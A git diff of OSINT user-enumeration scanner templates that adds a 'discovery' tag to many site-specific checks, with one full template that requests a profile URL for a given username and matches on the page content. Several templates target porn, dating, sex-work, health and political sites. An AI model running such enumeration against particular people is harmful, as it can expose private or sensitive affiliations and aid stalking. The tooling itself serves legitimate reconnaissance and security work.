a/http/osint/user-enumeration/psstaudio.yaml b/http/osint/user-enumeration/psstaudio.yaml index 76717a76091..e64c1a0cf03 100644 --- a/http/osint/user-enumeration/psstaudio.yaml +++ b/http/osint/user-enumeration/psstaudio.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,psstaudio + tags: osint,osint-porn,psstaudio,discovery self-contained: true diff --git a/http/osint/user-enumeration/public.yaml b/http/osint/user-enumeration/public.yaml index 1ef1aa2fa97..17aee4722d9 100644 --- a/http/osint/user-enumeration/public.yaml +++ b/http/osint/user-enumeration/public.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,public + tags: osint,osint-finance,public,discovery self-contained: true diff --git a/http/osint/user-enumeration/pypi.yaml b/http/osint/user-enumeration/pypi.yaml index 7f94d0914d6..81310fda436 100644 --- a/http/osint/user-enumeration/pypi.yaml +++ b/http/osint/user-enumeration/pypi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,pypi + tags: osint,osint-coding,pypi,discovery self-contained: true diff --git a/http/osint/user-enumeration/queer.yaml b/http/osint/user-enumeration/queer.yaml index 667e70d3280..51baff9fa2e 100644 --- a/http/osint/user-enumeration/queer.yaml +++ b/http/osint/user-enumeration/queer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,queer + tags: osint,osint-social,queer,discovery self-contained: true diff --git a/http/osint/user-enumeration/quitterpl.yaml b/http/osint/user-enumeration/quitterpl.yaml index 7a4b82cda69..04e0abbd925 100644 --- a/http/osint/user-enumeration/quitterpl.yaml +++ b/http/osint/user-enumeration/quitterpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,quitterpl + tags: osint,osint-social,quitterpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/quora.yaml b/http/osint/user-enumeration/quora.yaml index efbc018d234..9ce19c6ee36 100644 --- a/http/osint/user-enumeration/quora.yaml +++ b/http/osint/user-enumeration/quora.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,quora + tags: osint,osint-social,quora,discovery self-contained: true diff --git a/http/osint/user-enumeration/raddleme.yaml b/http/osint/user-enumeration/raddleme.yaml index 0e5e7ff9cb1..b5304725238 100644 --- a/http/osint/user-enumeration/raddleme.yaml +++ b/http/osint/user-enumeration/raddleme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,raddleme + tags: osint,osint-social,raddleme,discovery self-contained: true diff --git a/http/osint/user-enumeration/rantli.yaml b/http/osint/user-enumeration/rantli.yaml index cad6e6a6e59..36bde5ca8a9 100644 --- a/http/osint/user-enumeration/rantli.yaml +++ b/http/osint/user-enumeration/rantli.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,rantli + tags: osint,osint-blog,rantli,discovery self-contained: true diff --git a/http/osint/user-enumeration/reblogme.yaml b/http/osint/user-enumeration/reblogme.yaml index b26c2ea4d6a..9a71e0d308c 100644 --- a/http/osint/user-enumeration/reblogme.yaml +++ b/http/osint/user-enumeration/reblogme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,reblogme + tags: osint,osint-porn,reblogme,discovery self-contained: true diff --git a/http/osint/user-enumeration/redbubble.yaml b/http/osint/user-enumeration/redbubble.yaml index 49ef58a4a6b..59503bbd5c1 100644 --- a/http/osint/user-enumeration/redbubble.yaml +++ b/http/osint/user-enumeration/redbubble.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,redbubble + tags: osint,osint-shopping,redbubble,discovery self-contained: true diff --git a/http/osint/user-enumeration/reddit.yaml b/http/osint/user-enumeration/reddit.yaml index c2159da36ed..1072d4daffa 100644 --- a/http/osint/user-enumeration/reddit.yaml +++ b/http/osint/user-enumeration/reddit.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,reddit + tags: osint,osint-social,reddit,discovery self-contained: true diff --git a/http/osint/user-enumeration/redgifs.yaml b/http/osint/user-enumeration/redgifs.yaml index a2abc79cfcf..190aa77fc47 100644 --- a/http/osint/user-enumeration/redgifs.yaml +++ b/http/osint/user-enumeration/redgifs.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,redgifs + tags: osint,osint-porn,redgifs,discovery self-contained: true diff --git a/http/osint/user-enumeration/refsheet.yaml b/http/osint/user-enumeration/refsheet.yaml index 189f9672909..65327f875e8 100644 --- a/http/osint/user-enumeration/refsheet.yaml +++ b/http/osint/user-enumeration/refsheet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,refsheet + tags: osint,osint-hobby,refsheet,discovery self-contained: true diff --git a/http/osint/user-enumeration/replit.yaml b/http/osint/user-enumeration/replit.yaml index 24006d2da77..15f6807623c 100644 --- a/http/osint/user-enumeration/replit.yaml +++ b/http/osint/user-enumeration/replit.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social,replit + tags: osint,osint-social,replit,discovery self-contained: true diff --git a/http/osint/user-enumeration/researchgate.yaml b/http/osint/user-enumeration/researchgate.yaml index aab45f147f7..4a47b95aa21 100644 --- a/http/osint/user-enumeration/researchgate.yaml +++ b/http/osint/user-enumeration/researchgate.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,researchgate + tags: osint,osint-hobby,researchgate,discovery self-contained: true diff --git a/http/osint/user-enumeration/resumes-actorsaccess.yaml b/http/osint/user-enumeration/resumes-actorsaccess.yaml index f11fdd219d5..eecd2225492 100644 --- a/http/osint/user-enumeration/resumes-actorsaccess.yaml +++ b/http/osint/user-enumeration/resumes-actorsaccess.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,resumes-actorsaccess + tags: osint,osint-social,resumes-actorsaccess,discovery self-contained: true diff --git a/http/osint/user-enumeration/reverbnation.yaml b/http/osint/user-enumeration/reverbnation.yaml index 7cc22a7b89e..855f31c8143 100644 --- a/http/osint/user-enumeration/reverbnation.yaml +++ b/http/osint/user-enumeration/reverbnation.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,reverbnation + tags: osint,osint-social,reverbnation,discovery self-contained: true diff --git a/http/osint/user-enumeration/revolut.yaml b/http/osint/user-enumeration/revolut.yaml index dd2a8fd9442..f43c26de8a8 100644 --- a/http/osint/user-enumeration/revolut.yaml +++ b/http/osint/user-enumeration/revolut.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,revolut + tags: osint,osint-finance,revolut,discovery self-contained: true diff --git a/http/osint/user-enumeration/riskru.yaml b/http/osint/user-enumeration/riskru.yaml index 4078310000c..133e98c9cef 100644 --- a/http/osint/user-enumeration/riskru.yaml +++ b/http/osint/user-enumeration/riskru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,riskru + tags: osint,osint-hobby,riskru,discovery self-contained: true diff --git a/http/osint/user-enumeration/roblox.yaml b/http/osint/user-enumeration/roblox.yaml index 214769337d8..9f38574c78a 100644 --- a/http/osint/user-enumeration/roblox.yaml +++ b/http/osint/user-enumeration/roblox.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,roblox + tags: osint,osint-gaming,roblox,discovery self-contained: true diff --git a/http/osint/user-enumeration/rsi.yaml b/http/osint/user-enumeration/rsi.yaml index c0174e20fa0..065ff2ca10c 100644 --- a/http/osint/user-enumeration/rsi.yaml +++ b/http/osint/user-enumeration/rsi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,rsi + tags: osint,osint-gaming,rsi,discovery self-contained: true diff --git a/http/osint/user-enumeration/ru-123rf.yaml b/http/osint/user-enumeration/ru-123rf.yaml index 43b49c9ebca..f6fc738882a 100644 --- a/http/osint/user-enumeration/ru-123rf.yaml +++ b/http/osint/user-enumeration/ru-123rf.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,ru-123rf + tags: osint,osint-hobby,ru-123rf,discovery self-contained: true diff --git a/http/osint/user-enumeration/rubygems.yaml b/http/osint/user-enumeration/rubygems.yaml index 3bae509b4c0..dfd54fc09d4 100644 --- a/http/osint/user-enumeration/rubygems.yaml +++ b/http/osint/user-enumeration/rubygems.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,rubygems + tags: osint,osint-social,rubygems,discovery self-contained: true diff --git a/http/osint/user-enumeration/rumblechannel.yaml b/http/osint/user-enumeration/rumblechannel.yaml index 3119ab9a6a2..0120b6eb46d 100644 --- a/http/osint/user-enumeration/rumblechannel.yaml +++ b/http/osint/user-enumeration/rumblechannel.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,rumblechannel + tags: osint,osint-political,rumblechannel,discovery self-contained: true diff --git a/http/osint/user-enumeration/rumbleuser.yaml b/http/osint/user-enumeration/rumbleuser.yaml index 9ec0b9ac8c5..4fccbc41633 100644 --- a/http/osint/user-enumeration/rumbleuser.yaml +++ b/http/osint/user-enumeration/rumbleuser.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,rumbleuser + tags: osint,osint-political,rumbleuser,discovery self-contained: true diff --git a/http/osint/user-enumeration/runescape.yaml b/http/osint/user-enumeration/runescape.yaml index f2ab418a534..e279c1eed26 100644 --- a/http/osint/user-enumeration/runescape.yaml +++ b/http/osint/user-enumeration/runescape.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-gaming,runescape + tags: osint,osint-gaming,runescape,discovery self-contained: true diff --git a/http/osint/user-enumeration/salon24.yaml b/http/osint/user-enumeration/salon24.yaml index cac67f20539..e547d380769 100644 --- a/http/osint/user-enumeration/salon24.yaml +++ b/http/osint/user-enumeration/salon24.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,salon24 + tags: osint,osint-blog,salon24,discovery self-contained: true diff --git a/http/osint/user-enumeration/saracartershow.yaml b/http/osint/user-enumeration/saracartershow.yaml index c3aedd09f31..c0fa67d2906 100644 --- a/http/osint/user-enumeration/saracartershow.yaml +++ b/http/osint/user-enumeration/saracartershow.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,saracartershow + tags: osint,osint-political,saracartershow,discovery self-contained: true diff --git a/http/osint/user-enumeration/scoutwiki.yaml b/http/osint/user-enumeration/scoutwiki.yaml index 9aac579a2ac..8481f648c1d 100644 --- a/http/osint/user-enumeration/scoutwiki.yaml +++ b/http/osint/user-enumeration/scoutwiki.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,scoutwiki + tags: osint,osint-social,scoutwiki,discovery self-contained: true diff --git a/http/osint/user-enumeration/scratch.yaml b/http/osint/user-enumeration/scratch.yaml index f1f775094c8..3d1f6f64be1 100644 --- a/http/osint/user-enumeration/scratch.yaml +++ b/http/osint/user-enumeration/scratch.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,scratch + tags: osint,osint-coding,scratch,discovery self-contained: true diff --git a/http/osint/user-enumeration/scribd.yaml b/http/osint/user-enumeration/scribd.yaml index be341aeb370..dd9ec088fee 100644 --- a/http/osint/user-enumeration/scribd.yaml +++ b/http/osint/user-enumeration/scribd.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,scribd + tags: osint,osint-social,scribd,discovery self-contained: true diff --git a/http/osint/user-enumeration/secure-donation.yaml b/http/osint/user-enumeration/secure-donation.yaml index 8d1fe155b06..7d80ce59e01 100644 --- a/http/osint/user-enumeration/secure-donation.yaml +++ b/http/osint/user-enumeration/secure-donation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,secure-donation + tags: osint,osint-finance,secure-donation,discovery self-contained: true diff --git a/http/osint/user-enumeration/seneporno.yaml b/http/osint/user-enumeration/seneporno.yaml index 8ebfdb2d42c..f1d730dbd1b 100644 --- a/http/osint/user-enumeration/seneporno.yaml +++ b/http/osint/user-enumeration/seneporno.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,seneporno + tags: osint,osint-porn,seneporno,discovery self-contained: true diff --git a/http/osint/user-enumeration/sentimente.yaml b/http/osint/user-enumeration/sentimente.yaml index fd39c52672c..171537545f9 100644 --- a/http/osint/user-enumeration/sentimente.yaml +++ b/http/osint/user-enumeration/sentimente.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,sentimente + tags: osint,osint-dating,sentimente,discovery self-contained: true diff --git a/http/osint/user-enumeration/seoclerks.yaml b/http/osint/user-enumeration/seoclerks.yaml index 1703accab5b..52f69dacb39 100644 --- a/http/osint/user-enumeration/seoclerks.yaml +++ b/http/osint/user-enumeration/seoclerks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,seoclerks + tags: osint,osint-social,seoclerks,discovery self-contained: true diff --git a/http/osint/user-enumeration/sessionize.yaml b/http/osint/user-enumeration/sessionize.yaml index 5bcfb212c2c..3c4dc1b5ce5 100644 --- a/http/osint/user-enumeration/sessionize.yaml +++ b/http/osint/user-enumeration/sessionize.yaml @@ -1,37 +1,37 @@ -id: sessionize - -info: - name: Sessionize User Information - Detect - author: rxerium - severity: info - description: | - Sessionize user profile information check was conducted. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - max-request: 1 - verified: true - tags: osint,osint-social,sessionize - -self-contained: true - -http: - - method: GET - path: - - "https://sessionize.com/{{user}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'alt="Sessionize">' - - 'profile' - - 'Favorite' - condition: and - - - type: status - status: +id: sessionize + +info: + name: Sessionize User Information - Detect + author: rxerium + severity: info + description: | + Sessionize user profile information check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + tags: osint,osint-social,sessionize,discovery + +self-contained: true + +http: + - method: GET + path: + - "https://sessionize.com/{{user}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'alt="Sessionize">' + - 'profile' + - 'Favorite' + condition: and + + - type: status + status: - 200 # digest: 4a0a00473045022100b28e653dce430e7b02b035e2a10752e892d5a975974b7243211223f0b058848b0220333f20fc4f4cd5aca898c8fd01839f81f550d2f7ac4903a76da67f0ab5aad8e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/user-enumeration/setlistfm.yaml b/http/osint/user-enumeration/setlistfm.yaml index 1e09074bb7e..3d5497d1b59 100644 --- a/http/osint/user-enumeration/setlistfm.yaml +++ b/http/osint/user-enumeration/setlistfm.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,setlistfm + tags: osint,osint-music,setlistfm,discovery self-contained: true diff --git a/http/osint/user-enumeration/sexworker.yaml b/http/osint/user-enumeration/sexworker.yaml index 1ae2f57c390..7f5fe940878 100644 --- a/http/osint/user-enumeration/sexworker.yaml +++ b/http/osint/user-enumeration/sexworker.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,sexworker + tags: osint,osint-porn,sexworker,discovery self-contained: true diff --git a/http/osint/user-enumeration/sfd.yaml b/http/osint/user-enumeration/sfd.yaml index 38517db3297..0bb2c5375c8 100644 --- a/http/osint/user-enumeration/sfd.yaml +++ b/http/osint/user-enumeration/sfd.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,sfd + tags: osint,osint-health,sfd,discovery self-contained: true diff --git a/http/osint/user-enumeration/shanii-writes.yaml b/http/osint/user-enumeration/shanii-writes.yaml index 75fc75e5bc8..6d658ddbec6 100644 --- a/http/osint/user-enumeration/shanii-writes.yaml +++ b/http/osint/user-enumeration/shanii-writes.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,shanii-writes + tags: osint,osint-social,shanii-writes,discovery self-contained: true diff --git a/http/osint/user-enumeration/shesfreaky.yaml b/http/osint/user-enumeration/shesfreaky.yaml index 85abaab8d7e..8dd6b52d4af 100644 --- a/http/osint/user-enumeration/shesfreaky.yaml +++ b/http/osint/user-enumeration/shesfreaky.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,shesfreaky + tags: osint,osint-porn,shesfreaky,discovery self-contained: true diff --git a/http/osint/user-enumeration/shopify.yaml b/http/osint/user-enumeration/shopify.yaml index a9b4d44e893..cf7c1b00d23 100644 --- a/http/osint/user-enumeration/shopify.yaml +++ b/http/osint/user-enumeration/shopify.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,shopify + tags: osint,osint-shopping,shopify,discovery self-contained: true diff --git a/http/osint/user-enumeration/shutterstock.yaml b/http/osint/user-enumeration/shutterstock.yaml index 0876528d504..b82743266ea 100644 --- a/http/osint/user-enumeration/shutterstock.yaml +++ b/http/osint/user-enumeration/shutterstock.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,shutterstock + tags: osint,osint-images,shutterstock,discovery self-contained: true diff --git a/http/osint/user-enumeration/skeb.yaml b/http/osint/user-enumeration/skeb.yaml index f1facb97ee9..1375227e253 100644 --- a/http/osint/user-enumeration/skeb.yaml +++ b/http/osint/user-enumeration/skeb.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,skeb + tags: osint,osint-art,skeb,discovery self-contained: true diff --git a/http/osint/user-enumeration/sketchfab.yaml b/http/osint/user-enumeration/sketchfab.yaml index cd5cd38050e..ba5b9e5d698 100644 --- a/http/osint/user-enumeration/sketchfab.yaml +++ b/http/osint/user-enumeration/sketchfab.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-creative,sketchfab + tags: osint,osint-creative,sketchfab,discovery self-contained: true diff --git a/http/osint/user-enumeration/skillshare.yaml b/http/osint/user-enumeration/skillshare.yaml index 87eef6b76df..5acd884c601 100644 --- a/http/osint/user-enumeration/skillshare.yaml +++ b/http/osint/user-enumeration/skillshare.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,skillshare + tags: osint,osint-social,skillshare,discovery self-contained: true diff --git a/http/osint/user-enumeration/skyrock.yaml b/http/osint/user-enumeration/skyrock.yaml index 323c80fb700..a4f29d1afdd 100644 --- a/http/osint/user-enumeration/skyrock.yaml +++ b/http/osint/user-enumeration/skyrock.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,skyrock + tags: osint,osint-social,skyrock,discovery self-contained: true diff --git a/http/osint/user-enumeration/slack.yaml b/http/osint/user-enumeration/slack.yaml index 614226cf159..e298bd44cf6 100644 --- a/http/osint/user-enumeration/slack.yaml +++ b/http/osint/user-enumeration/slack.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,slack + tags: osint,osint-social,slack,discovery self-contained: true diff --git a/http/osint/user-enumeration/slackholes.yaml b/http/osint/user-enumeration/slackholes.yaml index 79d9d26c358..ecb1d541abe 100644 --- a/http/osint/user-enumeration/slackholes.yaml +++ b/http/osint/user-enumeration/slackholes.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,slackholes + tags: osint,osint-porn,slackholes,discovery self-contained: true diff --git a/http/osint/user-enumeration/slant.yaml b/http/osint/user-enumeration/slant.yaml index 5cdd0d69e4e..24cd39a31dd 100644 --- a/http/osint/user-enumeration/slant.yaml +++ b/http/osint/user-enumeration/slant.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,slant + tags: osint,osint-shopping,slant,discovery self-contained: true diff --git a/http/osint/user-enumeration/slides.yaml b/http/osint/user-enumeration/slides.yaml index d81bc252814..62bcb9bca5f 100644 --- a/http/osint/user-enumeration/slides.yaml +++ b/http/osint/user-enumeration/slides.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,slides + tags: osint,osint-social,slides,discovery self-contained: true diff --git a/http/osint/user-enumeration/slideshare.yaml b/http/osint/user-enumeration/slideshare.yaml index 1c44e15bfdd..6de20266dd1 100644 --- a/http/osint/user-enumeration/slideshare.yaml +++ b/http/osint/user-enumeration/slideshare.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,slideshare + tags: osint,osint-social,slideshare,discovery self-contained: true diff --git a/http/osint/user-enumeration/smashrun.yaml b/http/osint/user-enumeration/smashrun.yaml index 3a3ba476e55..35ea1b37262 100644 --- a/http/osint/user-enumeration/smashrun.yaml +++ b/http/osint/user-enumeration/smashrun.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,smashrun + tags: osint,osint-health,smashrun,discovery self-contained: true diff --git a/http/osint/user-enumeration/smelsy.yaml b/http/osint/user-enumeration/smelsy.yaml index 1c9b37810ca..cae7c0a9277 100644 --- a/http/osint/user-enumeration/smelsy.yaml +++ b/http/osint/user-enumeration/smelsy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,smelsy + tags: osint,osint-misc,smelsy,discovery self-contained: true diff --git a/http/osint/user-enumeration/smugmug.yaml b/http/osint/user-enumeration/smugmug.yaml index a1492182956..92319f2fe68 100644 --- a/http/osint/user-enumeration/smugmug.yaml +++ b/http/osint/user-enumeration/smugmug.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,smugmug + tags: osint,osint-images,smugmug,discovery self-contained: true diff --git a/http/osint/user-enumeration/smule.yaml b/http/osint/user-enumeration/smule.yaml index e64d1225988..3420a7db689 100644 --- a/http/osint/user-enumeration/smule.yaml +++ b/http/osint/user-enumeration/smule.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,smule + tags: osint,osint-music,smule,discovery self-contained: true diff --git a/http/osint/user-enumeration/snapchat-stories.yaml b/http/osint/user-enumeration/snapchat-stories.yaml index 112179f66ab..fd8b021b36f 100644 --- a/http/osint/user-enumeration/snapchat-stories.yaml +++ b/http/osint/user-enumeration/snapchat-stories.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,snapchat-stories + tags: osint,osint-social,snapchat-stories,discovery self-contained: true diff --git a/http/osint/user-enumeration/snapchat.yaml b/http/osint/user-enumeration/snapchat.yaml index eb5ff5a7412..bc622cac8af 100644 --- a/http/osint/user-enumeration/snapchat.yaml +++ b/http/osint/user-enumeration/snapchat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,snapchat + tags: osint,osint-social,snapchat,discovery self-contained: true diff --git a/http/osint/user-enumeration/snipfeed.yaml b/http/osint/user-enumeration/snipfeed.yaml index 3347679eeb9..1fedb58039c 100644 --- a/http/osint/user-enumeration/snipfeed.yaml +++ b/http/osint/user-enumeration/snipfeed.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,snipfeed + tags: osint,osint-misc,snipfeed,discovery self-contained: true diff --git a/http/osint/user-enumeration/soccitizen4eu.yaml b/http/osint/user-enumeration/soccitizen4eu.yaml index 9afc7416c39..986030c8226 100644 --- a/http/osint/user-enumeration/soccitizen4eu.yaml +++ b/http/osint/user-enumeration/soccitizen4eu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,soccitizen4eu + tags: osint,osint-social,soccitizen4eu,discovery self-contained: true diff --git a/http/osint/user-enumeration/social-msdn.yaml b/http/osint/user-enumeration/social-msdn.yaml index 1c09c0a3b86..4c701e951ae 100644 --- a/http/osint/user-enumeration/social-msdn.yaml +++ b/http/osint/user-enumeration/social-msdn.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,social-msdn + tags: osint,osint-social,social-msdn,discovery self-contained: true diff --git a/http/osint/user-enumeration/socialbundde.yaml b/http/osint/user-enumeration/socialbundde.yaml index b53471d0c98..2cbafbfa21f 100644 --- a/http/osint/user-enumeration/socialbundde.yaml +++ b/http/osint/user-enumeration/socialbundde.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,socialbundde + tags: osint,osint-social,socialbundde,discovery self-contained: true diff --git a/http/osint/user-enumeration/sofurry.yaml b/http/osint/user-enumeration/sofurry.yaml index 8afdaee6891..d25b1fc443c 100644 --- a/http/osint/user-enumeration/sofurry.yaml +++ b/http/osint/user-enumeration/sofurry.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,sofurry + tags: osint,osint-art,sofurry,discovery self-contained: true diff --git a/http/osint/user-enumeration/solikick.yaml b/http/osint/user-enumeration/solikick.yaml index 9f5c9857720..93c90192aa9 100644 --- a/http/osint/user-enumeration/solikick.yaml +++ b/http/osint/user-enumeration/solikick.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,solikick + tags: osint,osint-social,solikick,discovery self-contained: true diff --git a/http/osint/user-enumeration/soloby.yaml b/http/osint/user-enumeration/soloby.yaml index bbac5dbd980..c2e7c001cc4 100644 --- a/http/osint/user-enumeration/soloby.yaml +++ b/http/osint/user-enumeration/soloby.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,soloby + tags: osint,osint-social,soloby,discovery self-contained: true diff --git a/http/osint/user-enumeration/soloto.yaml b/http/osint/user-enumeration/soloto.yaml index 08819bda809..20ba30533e8 100644 --- a/http/osint/user-enumeration/soloto.yaml +++ b/http/osint/user-enumeration/soloto.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,soloto + tags: osint,osint-social,soloto,discovery self-contained: true diff --git a/http/osint/user-enumeration/soundcloud.yaml b/http/osint/user-enumeration/soundcloud.yaml index fe7448a8204..8461181bf40 100644 --- a/http/osint/user-enumeration/soundcloud.yaml +++ b/http/osint/user-enumeration/soundcloud.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,soundcloud + tags: osint,osint-music,soundcloud,discovery self-contained: true diff --git a/http/osint/user-enumeration/soup.yaml b/http/osint/user-enumeration/soup.yaml index ee6da8b0245..4ce126f233d 100644 --- a/http/osint/user-enumeration/soup.yaml +++ b/http/osint/user-enumeration/soup.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,soup + tags: osint,osint-blog,soup,discovery self-contained: true diff --git a/http/osint/user-enumeration/sourceforge.yaml b/http/osint/user-enumeration/sourceforge.yaml index b80494f444e..cddf0e9ea94 100644 --- a/http/osint/user-enumeration/sourceforge.yaml +++ b/http/osint/user-enumeration/sourceforge.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,sourceforge + tags: osint,osint-coding,sourceforge,discovery self-contained: true diff --git a/http/osint/user-enumeration/speaker-deck.yaml b/http/osint/user-enumeration/speaker-deck.yaml index 562c8c70e09..4f0595a4e5f 100644 --- a/http/osint/user-enumeration/speaker-deck.yaml +++ b/http/osint/user-enumeration/speaker-deck.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,speaker-deck + tags: osint,osint-social,speaker-deck,discovery self-contained: true diff --git a/http/osint/user-enumeration/speedrun.yaml b/http/osint/user-enumeration/speedrun.yaml index 62beb03ec85..9a1f7347226 100644 --- a/http/osint/user-enumeration/speedrun.yaml +++ b/http/osint/user-enumeration/speedrun.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,speedrun + tags: osint,osint-gaming,speedrun,discovery self-contained: true diff --git 